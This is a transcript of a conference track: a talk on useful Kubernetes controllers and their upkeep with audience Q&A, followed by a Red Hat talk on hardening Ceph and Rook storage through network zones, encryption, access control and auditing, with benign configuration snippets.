
And then the Prometheus stack. This one is actually not a controller, it's more of a Helm chart. The reason I put it on here is that it's super useful, because it installs the operator, it installs Grafana for you, it installs Alertmanager, pretty much an end-to-end Prometheus stack. Once you install this, and I will give a warning that the values file in that Helm chart is very large, it's massive, so going through it can be kind of painful, but you get adjusted to it and you can kind of see what you can do with it. But at a bare minimum, you can enable everything, and you get even the metrics server scraping metrics by default, and you get default Prometheus rules that are super useful.

Yeah, so then secrets. Secrets, if you've played with Kubernetes: they say Secrets, but it's actually just a base64-encoded string. You can cat it, or you can view the resource, and you can decode it and get the string. So that's not so secure. But how do you put this in source control? GitOps is very popular, and it's not good to put passwords in source control, just because, I mean, obvious reasons. My favorite is External Secrets, just because it's very agnostic. What it does is allow you to create secrets without having to hard-code them. It looks at a provider, pulls them, and injects them onto your Kubernetes cluster. So, same thing, it's an operator, and the external secret management system can be AWS Secrets Manager, it could be the Google one, Google Secret Manager, and then of course the agnostic one would be Vault. It's not specific to a cloud; you can spin up your own Vault instance and manage your secrets there. So External Secrets makes it very easy to play with these different providers, and you can go the cloud-agnostic way, or if you wanna go cloud-specific you can, or if you have multi-cloud infrastructure, you can have one External Secrets install that can talk to different providers, which is super neat.

And it's also neat because it's very dynamic. As an operator, it always watches. So if there's a change to the secret in, let's say, Secrets Manager, you update the secret there, and the controller very quickly updates the Secret resource on Kubernetes. You don't have to actually go and apply a change onto the Kubernetes cluster; you just update it in Secrets Manager, and it updates the Secret on the cluster. And if your app can pick up changes at runtime, you don't have to do any restarts; you can do live changes. So say a password gets exposed or something happens: you can just go into Secrets Manager and update that secret. And depending on your Secrets Manager setup, you can also have versions, so in case someone deletes a secret, or you need to get the old one for some odd reason, you can just look at the versions and pull it up. And yeah, this one's kind of different, because it's not actually talking to the Kubernetes API for those changes; it's talking to the provider for the controller to keep that state.
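For a flavor of what that looks like, borrowing the Pulumi Python style from the previous talk for consistency (you'd more typically write this as plain YAML), an ExternalSecret is roughly a custom resource like this. All the names here are made up, and it assumes a ClusterSecretStore called aws-secrets-manager has already been set up to point at the provider:

import pulumi_kubernetes as k8s

db_creds = k8s.apiextensions.CustomResource(
    "db-creds",
    api_version="external-secrets.io/v1beta1",
    kind="ExternalSecret",
    spec={
        "refreshInterval": "1h",  # how often the operator re-checks the provider
        "secretStoreRef": {"name": "aws-secrets-manager", "kind": "ClusterSecretStore"},
        "target": {"name": "db-creds"},  # the plain Kubernetes Secret it creates and keeps in sync
        "data": [
            {"secretKey": "password", "remoteRef": {"key": "prod/db", "property": "password"}},
        ],
    },
)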
And then DNS, our favorite. ExternalDNS would be my go-to, just because it's also kind of similar to External Secrets in that it can be quite agnostic across different providers. And it works in a similar way to the NGINX controller, in that it looks at annotations. So you have an ingress, and you add an annotation for ExternalDNS, and it will create that record. So pretty much it's just annotation-based: you add an annotation to your ingress and you get DNS.

And then autoscaling. For this one, I put the Vertical Pod Autoscaler. What it does is dynamically set resource requests and limits on your pod based on your usage. Sometimes you spin up an application or service and you're not sure what to set from a resource consumption standpoint, right? Like, you can put limits, but you truly don't know; you're kind of just guesstimating. The VPA kind of does that work for you. It looks at trends, and it will scale your deployment or pod with those requests and limits based on usage.

One thing, though: the VPA can be pretty dangerous, in my opinion. It uses admission controllers, and admission controllers are a different type of controller. What they do is intercept Kubernetes API requests, and they can modify an object before it gets applied. Admission controllers have things called mutating webhooks and validating webhooks, and depending on the application, it can use either one or both. So if you create a pod, it will intercept that, and if it's a mutating webhook, it will modify the request and then apply it to the Kubernetes API. One of the reasons why I say it's dangerous is because it's intercepting requests. I've had issues where the VPA had problems and the cluster couldn't scale up any pods, because every pod creation request was getting stopped by the controller, by the mutating webhook and the validating one. There were enough resources, the nodes were there, but we would scale, say, a deployment to like 50 and nothing would happen. It would just be context deadline errors. I'm not sure if anyone's seen that before when playing with Kubernetes; it's super vague, because it could be anything. It could be timeouts, it could be config errors. We just got constant context deadline errors, and it was the VPA and the mutating webhook that were stopping the create action on the API. So you have to be careful with this one. Also, the trends: if your traffic is very spiky, very dynamic, there might not be a pattern, and it might not give you the best recommendation based on the behavior.

And it comes with three components: the recommender, the updater, and the admission controller. The one I recommend is the recommender. It runs on your cluster, but it doesn't apply the changes. It tracks your trends and sees your usage, but it doesn't apply anything. So this is the safer route, because you see what it's actually recommending, but it's not gonna change your resources. From there, you can update your deployments with the resource requests and limits that you want, rather than having the VPA dynamically scale things for you, which can be pretty risky, especially in production.

The other one would be certificates, cert-manager. This one is for if you have, like, an internal setup where you do self-signed certs, or if you don't want to pay for certs, because there's Let's Encrypt. If you're unfamiliar with it, you can pretty much get free certificates.
There is some throttling, so you have to be kind of careful with using it sometimes, but you can get certs for free rather than paying a provider for them, when it's all totally free. It also makes it easy to renew certs, so you don't have to constantly... I'm pretty sure everyone, or at least the people who work in production, has had a cert expire, and it's just one of those things where you kind of shake your head and you're like, crap, not another one; it's always the one that was missed. What cert-manager does is, when a cert is getting close to its expiration time, it renews it for you, and hopefully, if you have alerting, you can get a heads-up even before that. Because you do have to watch cert-manager too, make sure it's not down or having issues, because that's another point of failure. It can use Vault, a benefit if you have your own private PKI, and of course Let's Encrypt.

So all this is great, and there are so many applications, but how do you install them? I'll keep this more high-level, because I figure you want to learn about controllers, not deployment tools. But there are many methods, in case you do want to install them. For packaging your applications, you can use either Helm or Kustomize. Personally, I like Helm myself. Kustomize, at least for me, has been difficult to read, but I've seen some people do some awesome things with it.

And then you have automation tools. You have Argo CD, I'm not sure if you're familiar with it. It uses, and this is tricky, Helm templates, not Helm itself. So it actually renders your templates and applies them, but you can't do a helm ls and see your application, or do a helm diff and use Helm functions to interact with the Helm deployment, because it's not an actual Helm deployment. But Argo CD is awesome because, at least in my experience, the maintenance has been almost nonexistent. It has practically just been running, and it gives you kind of a visual of your applications, so you can see all the resources. You can see the controller, you can see the pods, you can see the StatefulSets, the services. And then we have Spinnaker, which is another deployment tool. This one was built by Netflix. It's built as a bunch of microservices, and there are use cases for it, and it can bake a Helm chart for you. Depending on the use case, though, I found it too cumbersome to install and maintain, just because of the different microservices. And then Jenkins, where you could do a simple Jenkins job and deploy an application, or even Jenkins X; personally, I don't have experience with that one, but it is an option. And then Terraform. With Terraform you can use a Helm provider, in case you do wanna stick with Helm. Terraform and Ansible are kind of a thin line to cross, because in my opinion, Terraform should be infrastructure. It shouldn't be managing your applications. But there are use cases for it: say you have a Terraform module for a cluster, and you wanna auto-install something right when you create the cluster. Like, let's say you wanna install ExternalDNS and External Secrets automatically. You can use Terraform and the Helm provider, so when you spin up a cluster via Terraform, it already has those components there for you. So there are use cases, but I would say it's a thin line, and I'd be careful that you're not managing all your applications with Terraform.
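To make the Helm route concrete, installing one of these controllers is usually about two commands. The chart repo URL here is the one External Secrets documents; the release name and namespace are your choice:

helm repo add external-secrets https://charts.external-secrets.io
helm install external-secrets external-secrets/external-secrets \
  --namespace external-secrets --create-namespace

And then, of course, with great power comes great tech debt.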
All this is neat and it's nice, but it's a lot of applications, right? You're running these in production, and they're open source, so there are different release cycles, there are vulnerabilities, there are all different kinds of things that you have to stay on top of, because you can get very behind. I'm pretty sure in the past month alone, some of these applications had like five chart releases. So you have to be conscious of all the different apps that you're installing. It's difficult to keep track of them, but I would say pick a cadence. My preference is every quarter; you can even follow the Kubernetes release cycle. Just don't fall behind, because you'll get very behind, and then what happens, in my experience, is that Kubernetes has been deprecating and removing APIs. So if you have an old version of an application, it might be using an old API. Then you have to update, because you have to upgrade your cluster, and now you're in this spot where you're like, oh crap, everything is behind, and there's a bunch of breaking changes that happened in between, and now you're either dealing with fires or you're spending more time than if you had just gradually updated every quarter and updated your charts every quarter. That would be my recommendation, but it's very difficult to keep track of everything. Right now I think I just mentioned 10 applications that would be running, and all of those have different cycles.

And yeah, so actually, I went faster than I thought, but I'll leave it open for questions. I also wanna put in some closing words, and this is completely unrelated to everything in this presentation, but I just want to say: don't forget the golden rule. Treat others as you want to be treated, and in the current environment, just be nice to each other, be respectful, and help each other. This is the open source community, and we're here to learn from each other and help. This is how I started myself. I came to conferences, open source conferences, had mentors that helped me out, asked questions, failed fast. So help each other, and as you go on in this conference, talk to each other, network, and just help each other. That's it. So with that, do we have some questions? Don't give me a hard one.

Do you have any experience working with Helmfile, and can you say anything about that? Which one? Helmfile? No, what is it? I'm curious. It's a wrapper. No, I haven't had the pleasure, but I'll look into it, thank you. I mean, we have plenty of time, so I can give a quick overview if anyone wants to learn something. Would you mind? Well, it's a wrapper around Helm. Gotcha. Okay, awesome. Sorry? Who's familiar with Helmfile? I was asking if there was any knowledge of Helmfile, which acts as a wrapper around Helm and facilitates automation. Yeah, I haven't had the chance. I've mainly been using Argo CD, and with that one, depending on how you set up your repo, and now there are ApplicationSets, which make it a lot more dynamic, it's just values files, and there's a hierarchy and it merges them all. That's primarily been my use of Helm so far, and a little bit of Terraform, but Argo CD has been my main deployment tool.

Okay, we had another question. There was actually one back there, who was in the back. Yep, this is my exercise for the day. Thank you. Great talk today.
I'm a total newbie to Kubernetes, but can you confirm, is the controller the beginning of turning an application into, like, a LAMP stack application? What would you need? Do you need the controller basically to set up Apache, MySQL, or Nginx, MySQL, PHP, and have them talk to each other? Yeah, so there are a lot of controllers in Kubernetes. There are already some that are baked in when you spin up a Kubernetes cluster, so for pods and the native Kubernetes resources, there are already controllers for them. The ones I covered are extensions of the ones already in Kubernetes, and they're more for when you're ready to make your application external. Say you did your hello world, you have a LAMP stack that you spun up on Kubernetes, and now you wanna access it remotely. You'd have external-dns, and I would point it at the Ingress if it's external. But all of those are really to extend things, because you can just install, I think you can use MicroK8s or K3s, I can't pronounce that first one, but you can use one of those and spin up a LAMP stack just like that. You can have a deployment file or a pod resource file, you add the containers that you wanna spin up, and you can easily spin up a LAMP stack that way. These controllers are an extension for once you wanna go a bit beyond that. So let's say you've done Kelsey Hightower's Kubernetes the Hard Way and you're like, okay, what do I do now, right? Because you spun up a cluster, and what do you do now? What more can I do? These would help you answer that question of, what can I do now? But yeah, in case you wanna chat after, I'm happy to talk Kubernetes. There's a lot going on, even beyond the stuff I mentioned here; it's all open source, there are so many things happening, and it moves very fast. But if you wanna chat after, I'm really happy to. Over here. I'm glad you brought up the technical debt, because the cadence of changes in a Kubernetes cluster is just crazy. As far as the people portion of that goes, is there one team who's managing all the Helm charts for the infrastructure, or is it broken up, like the networking team is dealing with the Ingress controller and the security team is dealing with secrets controllers and things like that? It just seems hard to manage. Yeah, so it really depends, and you're referring to, let's say, a company or where I work, right? So it varies. Some teams or companies might have the bandwidth or the money to pay for an infrastructure team that can manage this. For us at Blizzard specifically, at least for the game teams, we're maybe 30 SREs split up across different game teams. And we're kind of siloed in that way, where me and two other people maintain our Kubernetes infrastructure. So we maintain all these charts and we have our own workflow for Kubernetes. Of course we share; we try not to do things twice or do double the work, and we try to share everything and be agnostic in the way we create modules and the stuff we share.
But yeah, at least on our side, we maintain our own infrastructure, and that's why we try to stay on top of these things, because we've been bitten by this multiple times, and it's a massive undertaking to maintain our cluster just because there are so many components that are constantly changing. Even the Kubernetes versions: I think they reduced it from four releases to three a year, just because they were releasing versions every cycle and it was getting to be too much for people, I think. Okay, we had, yeah, thank you for the talk. You just slightly touched on how controllers and operators are related. Do I get it right that they're kind of a similar thing, or can you give some more insight on that? Thank you. Can you repeat the question? I missed the first part. What's the relation between operators and controllers in Kubernetes? So an operator is more domain specific. It could be application based, so you could have a Vault operator that just looks at Vault resources, and the operator might have custom resources, CRDs, and it would watch those for events or changes in the API, and the operator applies resources based on the changes to those custom resources. A controller would be one of the ones native to Kubernetes, so the Job controller would be one, and I think there's one called the Pod controller, I might get the name wrong on that one, but they're all for native Kubernetes resources and they're already baked into Kubernetes. Operators are built by someone for their specific application and its custom resources. Don't a lot of operators contain a custom controller, though? So they have to, actually, you stumped me on that one, because they do work with different controllers depending on what events you're watching, but yeah, I'm stumped, I'll follow up with you and give you a better answer, sorry. Yeah, usually controllers are just looking at the world and iterating, and an operator is a controller coupled with CRDs, custom resources that it's operating on. The controller pattern came first, it existed for a long time, and then they named this pattern afterwards, the operator, where you create your own custom resource and then you modify objects based on the CRDs. There you go, a smarter guy than me right there answered it, thank you. Okay. So I've got a quick question on Argo CD for rollbacks on canary deployments. That would be an awesome tool. My question is, for a rollback, what would trigger a rollback on a canary deployment? Would it be a crash loop event, or a health check endpoint on the deployment? So it depends. Argo CD just does the native deployments, so it depends on how you have the deployment set up, the health checks you're checking, and, what's the other one, the number of pods that are unavailable. But there's a thing called Argo Rollouts, which is an extension of Argo CD, maintained by the same people, I think Intuit, the company that built Argo CD. They have another project called Argo Rollouts, which does blue-green deployments and canary, and those have certain conditions you can set. So say you have a percentage set for the deployment: Rollouts will look at that, and it will roll back depending on the thresholds you set. Any more questions?
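To make that rollback discussion concrete, a canary strategy in Argo Rollouts looks roughly like this; the names, image, and weights are placeholders. Automated rollback is typically wired up by attaching an AnalysisTemplate that checks metrics between steps: if the analysis fails, or the new pods never go healthy, Rollouts aborts and returns traffic to the stable version.

    kubectl apply -f - <<'EOF'
    apiVersion: argoproj.io/v1alpha1
    kind: Rollout
    metadata:
      name: demo-rollout           # hypothetical name
    spec:
      replicas: 5
      selector:
        matchLabels:
          app: demo
      template:
        metadata:
          labels:
            app: demo
        spec:
          containers:
          - name: demo
            image: nginx:1.21      # placeholder image
      strategy:
        canary:
          steps:
          - setWeight: 20          # send 20% of traffic to the canary
          - pause: {duration: 60s} # watch health/analysis before continuing
          - setWeight: 50
          - pause: {}              # pause until promoted (or aborted) manually
    EOF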
Maybe it's more of a comment, or a question to the audience. I noticed you haven't mentioned Skaffold within this automated deployment and maintenance story. So I wonder if anyone has experience running Skaffold for, like, a production environment? You mean Skaffold with a K, the cloud native project, yeah? Okay. I think it varies by the company or whatever you're trying to do. Everyone might have templates and things, but production ready is a loaded term, I would say. Maybe someone has a better answer, but there are many different ways you can do something and set up different templates. I'm not sure there's anything open source that has something that would be production ready out of the box. Yeah, I don't think I have a better answer for that one. Sorry. Okay, one more here. Skaffold is a great tool for development, but it's also a CLI. So if you're using Skaffold in production, that feels like a single point of failure. If ever that CLI stopped, or if ever the box that was running that CLI was reset, then your deployments would stop. I think I would rather have some cloud native something that was continuously monitoring and did the thing. So would I wrap Skaffold in GitHub Actions or, you know, something like that? I think I'm starting to over-engineer it. Other questions? Comments? Okay. Awesome. Well, thank you very much, Jim. Thank you everybody for attending during lunch time. And we will be back at one PM with the Ceph and Rook storage folks talking about how you secure your cloud native storage. Two, test. One, two. One, two. Test. Okay. Hello everyone. Please come in, take a seat. We're gonna get ready in just a few minutes here to talk about data security using Rook and Ceph. But yeah, please have a seat. Oh yeah, also, I'm totally smiling behind my mask and you all can't see that. I'm trying to look welcoming, so instead I'll be awkward on the mic. All right, welcome back to the cloud native track. I hope you had a wonderful lunch. We are ready to kick off the afternoon with data storage security using Rook and Ceph, with Anna McTaggart and Federico, whose last name is... It's a hard one. Say it again for us. Lucifredi. Please welcome them, and take it away. Thank you. So nice to see you all after two years. Now, my marketing manager would not forgive me if I gave up on the introducing-myself part, so here is the short version. I've had the privilege of spending my entire career in open source software. I'm the product management director for the Ceph platform at Red Hat. Before that I was on Ubuntu Server at Canonical. You know, that was my favorite. And if you go back a decade, I was the dreaded systems management czar at SUSE. Here's a list of a few things that I worked on. SLES is SUSE Linux Enterprise Server; that's what we call it. I was the maintainer of man for about 10 years; that's the man(1) there at the bottom. And, shameless plug, I have a book on AWS operations out from O'Reilly, and that's why you see me all surrounded by clouds there. And I'm joined by Anna. Hey, I'm Anna McTaggart. I'm newer at Red Hat, but I work on cybersecurity here. I did my undergrad at UMass Amherst and graduate school at UC Santa Cruz. I went from an academic background in deniable file systems, to oblivious computing, to formal methods, to incident response at Red Hat. I also work on a formal methods community of practice at Red Hat, and also SAP security.
And in my free time, I like to hike with my dog, garden a lot, and work towards a more inclusive world. Righty, so if you're here, you probably already know what Ceph is, but the 60-second version is that Ceph is the dominant software-defined storage solution in open source. Those of us who work on Ceph like to think of it as the future of storage, and we're quite proud of the community we've built around the project and of its technical prowess. Ceph is highly scalable, or horizontally scalable, highly available, highly resilient, and capable of serving file, block, and object. And that's why there are more than three exabytes of Ceph out there. Many other things can be said about Ceph; it's the bee's knees, is the short version. But you are here, so hopefully you already know that. If you don't, go see Mike at the Ceph booth this afternoon and he will give you a proper education. For now, think of it as the Linux kernel of storage, if you're not familiar. Less famous, but equally awesome, Rook is the CNCF project that fronts the storage, and it's basically a Ceph operator. Rook helps reduce the operational burden a storage team faces by delivering cloud native storage for Kubernetes. Ceph creates horizontally scaled and self-healing clusters, and Rook complements that by making them increasingly self-managing, and even self-scaling if you want to look at it that way. Rook enables Ceph to deploy on Kubernetes with ease, enabling all the benefits of container orchestration on what is now the dominant private cloud platform. That means storage running on top of the compute infrastructure like any other workload would, or, alternatively, storage running on bare metal as an external entity for petabyte-scale storage delivery to many Kubernetes clouds. Rook is the storage operator, so now the stage is set for the security of these two fellows. Now, security practices harden a specific point of the infrastructure; cherry-picking practices without a model of the threat and the attacker is not a viable strategy. The joke usually goes, if you want to protect from all possible threats, you need to turn the computer off, bury it in concrete, and drop it at the bottom of the ocean. In other words, absolute security is not usable, and probably not even possible, but that's secondary; it's just not a useful framing. You have to have a model of what you're protecting against. So you define your security in the context of a threat model. Are you facing script kiddies, or the GRU, or the dreaded privileged insider that we should all be worrying about? These are very different scenarios, and the things that you do are significantly different. Some of these want to steal your data, others want to crypto-lock your data and hold you for ransom, and others yet may be satisfied by causing disruption, deleting a few files, or causing a transient denial of service. So, with that in mind, let's dive right in on what you can harden specifically, starting with network security with Ceph and Rook. The public security zone is an entirely untrusted area of the cloud. It could be the internet as a whole, or just networks external to your cluster that you have no authority over. Data transmissions crossing this zone should make use of encryption. And note that the public zone, as I just defined it, does not include the storage cluster front end, the Ceph public_network, which defines the storage front end and properly belongs in the storage access zone.
The Ceph client zone refers to networks accessing Ceph clients like the Object Gateway, the Ceph file system, or block storage. Ceph clients are not always excluded from the public security zone; for instance, it's possible to expose the Object Gateway's S3 or Swift API in the public security zone. Next, the storage access zone is instead an internal network providing Ceph clients with access to the storage cluster itself. And the cluster zone refers to the most internal network, providing storage nodes with connectivity for replication, heartbeat, backfill, and recovery tasks. This zone includes the Ceph cluster's backend network, called the cluster_network in Ceph. Operators often run clear-text traffic in the cluster zone, relying on the physical separation or VLAN separation of the network from any other traffic. This, for example, would not be a valid choice if your threat model includes adversarial privileged insiders, going back to what we were just saying. These four zones are separately mapped or combined depending on the use case and the threat model in use. There is another network that is common but not properly part of Ceph itself, which is what you could think of as a management network. It's nice to have a separate network that cannot be flooded by user events or service events, for things like SSH, monitoring, maintenance, PXE. So that is not one of the Ceph networks, but most Ceph users, or many Ceph users, choose to have it physically separate, for insurance reasons, for special situations. Now, with that model, components spanning the boundary of two security zones with different trust or authentication requirements must be carefully configured. These are natural weak points in a network architecture and should always be configured to meet the requirements of the higher level of trust between the zones being connected. In many cases, the security controls here should be a primary concern, due to the likelihood of attack at this point. Operators should consider exceeding zone requirements at integration points, which for a storage product is actually often easier to accomplish than in the general case. Your storage system may be able to serve any kind of storage, but in your specific enterprise or agency, you may be using it for just one type of storage, like object only. And that gives you a much smaller envelope that you can use to narrow down what you're allowing people to use. For example, the cluster security zone can be isolated from other zones easily, because there is no reason for it to connect to the other zones. Conversely, an object gateway in the client security zone will need to access a lot of things: the monitors on port 6789, the OSDs on ports 6800 to 7300, depending on how many you have, and it will likely expose its S3 API to the world, to the public security zone, on ports 80 and 443. So different Ceph daemons have different characteristics, and you have to leverage them accordingly.
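As a concrete sketch of those integration points, opening only the ports a given node actually needs might look like this with firewalld; which rules belong on which node depends on the daemons it runs, and the zone here is firewalld's zone concept, not the security zones from the talk:

    # monitors: msgr2 (3300) and the legacy port (6789)
    sudo firewall-cmd --permanent --add-port=3300/tcp --add-port=6789/tcp
    # OSD daemon range mentioned above
    sudo firewall-cmd --permanent --add-port=6800-7300/tcp
    # RGW S3 endpoints, only if this node runs an object gateway
    sudo firewall-cmd --permanent --add-port=80/tcp --add-port=443/tcp
    sudo firewall-cmd --reload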
Now let's move from network to encryption. Server side, Red Hat customers overwhelmingly choose to encrypt data at rest. I stopped tracking this in 2016; at that point, more than 60% of our customers were using at-rest encryption, and it was rapidly going up. It's basically a default. And the mechanism they use to encrypt the data at rest is the Linux Unified Key Setup, better known to all of us as LUKS. All data and metadata of a Ceph storage cluster can be secured using a variety of dm-crypt configurations. The security best practice here is to locate the monitor daemons on separate hosts from the storage daemons, so the mons on separate hosts from the OSDs. We do this because the mons keep the dm-crypt keys. So if someone walks away with one hard drive, they don't have the keys, because those are on the mon. And if somebody walks out with a whole box, because the box has either an OSD or a mon but not both, they cannot decrypt the data either; they don't have the keys for it. Ensuring anti-affinity of the keys and the data they encrypt means that physical removal of a host does not include its decryption keys. The Object Storage Gateway has additional capabilities, including encryption at ingestion, the use of per-user keys as opposed to per-drive keys, key rotation using tools like Vault and soon cephadm, support for Amazon AWS SSE-KMS, and more. Department of Defense certified ciphers under the FIPS 140-2 standard can be used if they are supplied by the operating system, so you can get those on RHEL or on certain versions of Ubuntu. Here, the interesting comparison is this: you can encrypt the disks with dm-crypt and have data encrypted at rest just because it's on the drive. In that model, you have operator-managed keys. The operator is managing all the keys for you; you, as the user, are not doing anything with the keys. The alternative is that you use encryption at ingestion time. RGW can encrypt the data when it is ingested, and decrypt it when it is retrieved, with a user key provided at runtime. If you're doing this, the keys are user-managed; the responsibility is all on the user. But there is also a slightly different property, in that with dm-crypt, once the drive is open, it's available to the system. Okay, you have to be root to access that drive, but in a sense, you can access that data. Whereas in the RGW ingestion model, the key is only there while writing the data or retrieving the data, and then it's gone. So the exposure time of the data is also significantly smaller. Lots of trade-offs to play with as you build your model. Network communication can be secured by turning on Ceph protocol encryption in the messenger v2.1 protocol introduced with Nautilus, which is a recent release. Here's the thing about clear text on the network front. I told you that almost all of our customers encrypt data at rest. On the network front, the practice is that customers encrypt the data as it goes out of the cluster to their application. Depending on what the application is, block or object, they encrypt it accordingly in different ways. But the internal Ceph traffic is overwhelmingly in clear text. With Nautilus, the option to encrypt the internal network traffic became available. This is relevant in two ways. One is that there are parts of the Ceph system where the Ceph protocol is in use all the way to the client, like CephFS. In that case, the only way you can secure that connection is by encrypting the Ceph protocol, so you need that support. The other part where it's relevant is that a significant number of customers asked for this, and I wasn't quite clear why, because it seemed like a silly thing to say, I'm going to encrypt all the traffic on a network that nobody can touch. So after a couple of customers came with this, I said, well, do you have a Snowden problem? Do you have a privileged insider problem? Is that what you're trying to protect against? And they said, yes, we have a requirement to protect against privileged insiders.
Now, this was a customer discussion, so you cannot tell a customer that they are wrong, but it's extremely difficult to protect against a privileged insider. You could argue that it's impossible if someone is sufficiently privileged. So in this scenario, it seemed like a weird thing to ask for. Then after a while, I saw a different pattern, which is that all of these customers were coming from the same country, and they had a regulatory requirement that that country's telco agency had created to make NSA eavesdropping on their citizens harder, by basically encrypting all links, no matter what or where. So that finally explained why this was happening. But this is still useful functionality. In most cases that are not regulatory driven, this can still be helpful. Let's say that you're a large enterprise and you have a policy that everything must be encrypted, no matter what. You can go and argue with the security team that they don't encrypt the backplane of a NetApp appliance, so they shouldn't require encrypting the private network of Ceph, and go back and forth until they give you permission. Or you could buy a few more Intel CPUs and not have that discussion. So it's a very good way to bypass certain authorizations, and why not? It's going to make you more secure. And since the overhead of encryption is generally shadowed by the latency of the fact that this is a network storage system, you add a little bit more CPU to cover what's needed to support the encryption path itself, and the performance of the cluster for most use cases will look the same to the application. So it's a very valid option in that sense, and we won't judge what your reasons are. Looking at more specific protocols, the S3 service is usually secured between RGW and the S3 client with TLS, obviously, on port 443. RGW also very often serves clear text on port 80, because you can use RGW as a web server, and not all web server use cases are necessarily encrypted. TLS termination at HAProxy in front of RGW is a special case, where you'll have to decide what happens on the link between HAProxy and RGW. Does that need to be encrypted or not on your network? If it's in the clear, it should be in the right security zone. Obviously, I'm not going into standard network practices like firewalling individual nodes to expose only the declared list of ports and things like that; standard network hygiene applies. And now I'm going to hand over to Anna. Hey, so now we're going to talk about specifics for Rook. Rook can use custom resource definitions to encode a lot of security preferences and settings. For example, we can configure trust certificates for the RADOS Gateway's web server. Rook also supports at-rest data encryption, like we discussed earlier. We recently allowed in-flight Ceph protocol encryption in Rook 1.9. This lets us implement a lot more secure features and just generally get better security. We can also segregate our traffic using a software-defined cloud network fabric. In addition, the Kubernetes user permission system applies to all the persistent volumes, so permissions, quotas, everything like that that comes from Kubernetes applies; nothing Rook needs to do here. Rook also supports a key management system in the Container Storage Interface driver, which allows individual volumes to be encrypted with their own key. This limits the scope per key, which is a really important security practice. All of this ensures that we can follow best practices easily.
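As a sketch of where those knobs live in a Rook-managed cluster, the fields below follow the Rook 1.9-era CephCluster CRD as best as it can be reconstructed here; check the Rook docs for your version before relying on exact names:

    kubectl apply -f - <<'EOF'
    apiVersion: ceph.rook.io/v1
    kind: CephCluster
    metadata:
      name: rook-ceph
      namespace: rook-ceph
    spec:
      cephVersion:
        image: quay.io/ceph/ceph:v16    # illustrative Ceph release
      dataDirHostPath: /var/lib/rook
      mon:
        count: 3
      network:
        connections:
          encryption:
            enabled: true               # in-flight msgr2 protocol encryption
      storage:
        useAllNodes: true
        useAllDevices: true
        config:
          encryptedDevice: "true"       # LUKS/dm-crypt OSDs for at-rest protection
    EOF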
We can follow key rotation, revocation, and limiting the scope of each key. This also limits the scope of our unencrypted traffic, which is really important. Now let's talk about the control plane for Rook. As popularized by Ansible, SSH is used by cephadm, ceph-ansible, and other deployment and day-one tools to provide a secure command path for install and upgrade operations as part of host management. This is important so that we are limiting the people that can have access, while still enabling access for host management. The dashboard shouldn't be exposed to the world, but it needs to be reachable from the operator's workstation to be of use. You can't just say no one can access the host management system and then expect us to use it. It has to be accessible somehow, so we do this via SSH, which really limits access and locks it down. The dashboard access zone can likewise be tailored by the operator to suit the local threat model. Again, you probably don't want it exposed to the world, but it needs to be accessible to some people. You can have SAML authorization, Kubernetes-native authorization, lots of options there. The Ceph manager is also accessible via SSH. Now let's talk a little bit more about identity and access for Ceph. Ceph uses shared secret keys, which protects clusters from man-in-the-middle attacks by default. Now, you still need some good practices. One good practice here is to grant keyring read and write permissions only to the current user and root, with the client.admin user being restricted to root only. You don't want all users to be root; that would not be very secure. But you want to make sure that somebody has it, so your client.admin user can be restricted to root only. Then, talking about RGW, it also supports the key-and-secret model of AWS S3 and the equivalent model of OpenStack Swift, so those are some more authentication models that you can use. With S3, we also have bucket policy as an option, which enables you to apply bucket permissions, like on an S3 bucket, accordingly. Now, of course, your administrator key and secret, regardless of whether it's S3-native, Swift, whatever, you have to treat it with appropriate respect. You really want to use your administrative users sparingly, which we're able to do in Rook, like I just said. With RGW, the user's data is also stored in Ceph pools, and again, we have great ways to secure those, as Federico said, so you can store them securely with your data at rest. You can couple with OIDC providers such as Keycloak, backed by your organization's identity provider. This can give you granular roles or access attributes, really granularly, and make sure that access is locked down as much as possible, really limiting your scope of access. We also support LDAP, Active Directory, Keystone identity, and Vault. These are all supported in Rook with Ceph. And again, auditing is a really important part of security. This is an example of a Ceph audit log. You want to check your operators' actions against a cluster; they're being logged. You want to periodically remove the logs, of course, so that somebody can't just access your log and see everything that you've ever done. You might want to aggregate these to your log management system as appropriate. But again, you probably want to delete them at some point.
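The keyring hygiene described above looks roughly like this on a Ceph node; the client and pool names here are made up for illustration:

    # owner (and root) only on the admin keyring
    chmod 600 /etc/ceph/ceph.client.admin.keyring
    # mint a least-privilege key for the application instead of handing out client.admin
    ceph auth get-or-create client.webapp \
      mon 'allow r' \
      osd 'allow rw pool=webapp-data' \
      -o /etc/ceph/ceph.client.webapp.keyring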
So let's talk data retention. With RADOS, your users generally don't have the ability to read, write, or delete objects directly in a storage pool. You can apply a bucket object lock, so that all objects in a bucket have the same security requirement. You might even want to have multi-factor authentication requirements to remove an object from one of these buckets. It's a little bit different on a Ceph block device, object gateway, or file system: there, your user can create, delete, and modify volume images, objects, and files. But again, with RADOS it's a little bit more locked down. When we delete data from a Ceph cluster, though, whether as a user or an admin, it generally can't be recovered for practical use. There are a couple of exceptions. RBD supports trash bin semantics with spare pool capacity. You can also have issues with versioning of object store buckets resulting in deleted objects being preserved until deleted by policy or by the administrator. But generally speaking, once we delete something, it's not accessible. So if you delete your log, nobody can find it, which is great from a security point of view, because nobody can dig through your deleted data. Now, if user data retention is one of your concerns, you might want to configure your storage pools accordingly. Additionally, you should be aware that individual data blocks are present on persistent storage until overwritten. So that is a risk with deleted data, but again, it's generally not accessible. Now, if you're actually retiring your media and you don't want somebody digging through your dumpster to find all your data, you might want to encrypt it at rest and then discard the key. Nobody's going to be decrypting it; that would require pretty intense resources that are probably not worth it. So you can do that when you replace an OSD: it's encrypted, just delete the key. Or do the same if you don't trust your cloud storage provider to properly clear the disks. So those are some options that you can use. We also have infrastructure hardening options. These are highly vendor dependent, so we're going to talk about what Red Hat does; your Ceph distribution might vary. At Red Hat, we ship with SELinux on by default, in enforcing mode. This is important: it enables greater security, and it doesn't require anybody to configure it. We can also make use of FIPS 140-2 certified ciphers as supplied by RHEL; for example, RHEL 8.2 is our most recent certified version, and we regularly certify these. In addition, we also harden certain binaries. Red Hat's Ceph storage binaries are built with the options listed here, such as FORTIFY_SOURCE, stack clash protection, all of these options. You want to consult with your vendor to see what is being done to harden your binaries, just to make sure that they're consistently secure. These represent the intersection points of the network security zones, as we've discussed. In addition, at Red Hat, we run Coverity pretty regularly. We run those scans, we look through those scans, we see what's going on there. We also regularly ship fixes for any reported CVE or exploit, working with our incident response team to make sure that nothing is left insecure. Now, there's always a risk, but these hardening options really do increase the security. Again, they're vendor specific, but this is what we're doing at Red Hat, and you can apply all of these accordingly.
